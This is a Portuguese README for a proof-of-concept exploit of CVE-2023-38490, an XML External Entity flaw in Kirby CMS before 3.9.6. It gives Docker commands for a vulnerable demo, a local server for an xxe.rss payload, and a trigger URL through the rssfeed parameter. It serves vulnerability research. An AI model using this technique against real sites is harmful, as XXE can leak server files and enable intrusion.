
Kirby < 3.9.6 exploit de XML External Entity
Kirby < 3.9.6 XML External Entity
Exploit para CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Crie e execute o aplicativo de demonstração vulnerável:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Sirva o payload de demonstração:
Nota: escolha um endereço de bind que o container docker possa acessar.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Acione o exploit:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
A função vulnerável está presente no Kirby Core, mas não é usada por padrão no Kirby Core, Kirby StarterKit ou Kirby PlainKit. Isso significa que a vulnerabilidade não o afetará na configuração padrão, mas pode ser introduzida com desenvolvimento personalizado ou pela instalação de um plugin que utilize o kit de ferramentas afetado.
A ACCEIS não promove ou incentiva qualquer atividade ilegal, todo o conteúdo fornecido por este repositório destina-se apenas a fins de pesquisa, educacionais e de detecção de ameaças.